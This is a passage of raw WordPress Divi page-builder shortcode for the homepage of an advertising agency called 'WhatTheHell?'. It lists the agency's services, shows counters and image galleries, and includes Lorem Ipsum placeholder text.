custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" 